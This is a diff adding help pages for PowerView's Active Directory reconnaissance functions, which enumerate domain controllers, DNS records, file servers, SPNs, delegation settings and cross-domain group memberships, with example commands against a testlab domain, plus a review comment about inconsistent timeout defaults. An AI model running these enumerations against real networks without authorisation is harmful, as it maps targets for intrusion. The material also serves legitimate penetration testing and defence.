EXAMPLE 2 -------------------------- +``` +Get-DomainComputer -SPN mssql* -Domain testlab.local +``` + +Returns all MS SQL servers in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained +``` + +Search the specified OU for computeres that allow unconstrained delegation. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. 
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SamAccountName, Name, DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Unconstrained +Switch. +Return computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TrustedToAuth +Switch. +Return computer objects that are trusted to authenticate for other principals. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Printers +Switch. +Return only printers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SPN +Return computers with a specific service principal name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePrincipalName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OperatingSystem +Return computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServicePack +Return computers with a specific service pack, wildcards accepted. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SiteName +Return computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ping +Switch. +Ping each host to ensure it's up before enumerating. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md new file mode 100755 index 0000000..3d15f5c --- /dev/null +++ b/docs/Recon/Get-DomainController.md 
@@ -0,0 +1,132 @@ +# Get-DomainController + +## SYNOPSIS +Return the domain controllers for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain + +## SYNTAX + +``` +Get-DomainController [[-Domain] ] [-Server ] [-LDAP] [-Credential ] +``` + +## DESCRIPTION +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. +The -LDAP switch uses Get-DomainComputer +to search for domain controllers. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainController -Domain 'test.local' +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController -Domain 'test.local' -LDAP +``` + +Determine the domain controllers for 'test.local' using LDAP queries. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'test.local' | Get-DomainController +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for domain controllers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +Switch. +Use LDAP queries to determine the domain controllers instead of built in .NET methods. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. + +System.DirectoryServices.ActiveDirectory.DomainController + +If -LDAP isn't specified. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md new file mode 100755 index 0000000..ce33275 --- /dev/null +++ b/docs/Recon/Get-DomainDFSShare.md 
@@ -0,0 +1,202 @@ +# Get-DomainDFSShare + +## SYNOPSIS +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domain. + +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainDFSShare [[-Domain] ] [[-SearchBase] ] [[-Server] ] + [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] [-Tombstone] + [[-Credential] ] [[-Version] ] +``` + +## DESCRIPTION +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDFSShare +``` + +Returns all distributed file system shares for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDFSShare -Domain testlab.local +``` + +Returns all distributed file system shares for the 'testlab.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Version +{{Fill Version Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md new file mode 100755 index 0000000..e444fd5 --- /dev/null +++ b/docs/Recon/Get-DomainDNSRecord.md 
@@ -0,0 +1,181 @@ +# Get-DomainDNSRecord + +## SYNOPSIS +Enumerates the Active Directory DNS records for a given zone. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord + +## SYNTAX + +``` +Get-DomainDNSRecord [-ZoneName] [-Domain ] [-Server ] [-Properties ] + [-ResultPageSize ] [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. +Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSRecord -ZoneName testlab.local +``` + +Retrieve all records for the testlab.local zone. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone | Get-DomainDNSRecord +``` + +Retrieve all records for all zones in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local +``` + +Retrieve all records for all zones in the dev.testlab.local domain. + +## PARAMETERS + +### -ZoneName +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. + +## NOTES + +## RELATED LINKS + 
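Review bot: The -ServerTimeLimit section of Get-DomainDNSRecord.md contradicts itself: the description says "Default of 120 seconds" while the yaml block directly below reports `Default value: 0`. One of the two is wrong for a reader trying to predict query behaviour, so either the parameter default in the function or the help text should be changed so they agree before the docs are regenerated. Also in this hunk, the -ZoneName description misspells "enumerated" as "enumearted".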
diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md new file mode 100755 index 0000000..7065b26 --- /dev/null +++ b/docs/Recon/Get-DomainDNSZone.md 
@@ -0,0 +1,156 @@ +# Get-DomainDNSZone + +## SYNOPSIS +Enumerates the Active Directory DNS zones for a given domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainDNSZone [[-Domain] ] [-Server ] [-Properties ] [-ResultPageSize ] + [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSZone +``` + +Retrieves the DNS zones for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local +``` + +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. + +## PARAMETERS + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSZone + +Outputs custom PSObjects with detailed information about the DNS zone. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md new file mode 100755 index 0000000..34e9f00 --- /dev/null +++ b/docs/Recon/Get-DomainFileServer.md 
@@ -0,0 +1,200 @@ +# Get-DomainFileServer + +## SYNOPSIS +Returns a list of servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainFileServer [[-Domain] ] [[-LDAPFilter] ] [[-SearchBase] ] + [[-Server] ] [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] + [-Tombstone] [[-Credential] ] +``` + +## DESCRIPTION +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainFileServer +``` + +Returns active file servers for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainFileServer -Domain testing.local +``` + +Returns active file servers for the 'testing.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. 
+"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +One or more strings representing file server names. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md new file mode 100755 index 0000000..9061774 --- /dev/null +++ b/docs/Recon/Get-DomainForeignGroupMember.md 
@@ -0,0 +1,238 @@ +# Get-DomainForeignGroupMember + +## SYNOPSIS +Enumerates groups with users outside of the group's domain and returns +each foreign member. +This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainForeignGroupMember [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignGroupMember +``` + +Return all group members in the current domain where the group and member differ. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignGroupMember -Domain dev.testlab.local +``` + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. +binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md new file mode 100755 index 0000000..85b0092 --- /dev/null +++ b/docs/Recon/Get-DomainForeignUser.md 
@@ -0,0 +1,239 @@ +# Get-DomainForeignUser + +## SYNOPSIS +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser + +## SYNTAX + +``` +Get-DomainForeignUser [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignUser +``` + +Return all users in the current domain who are in groups not in the +current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignUser -Domain dev.testlab.local +``` + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. 
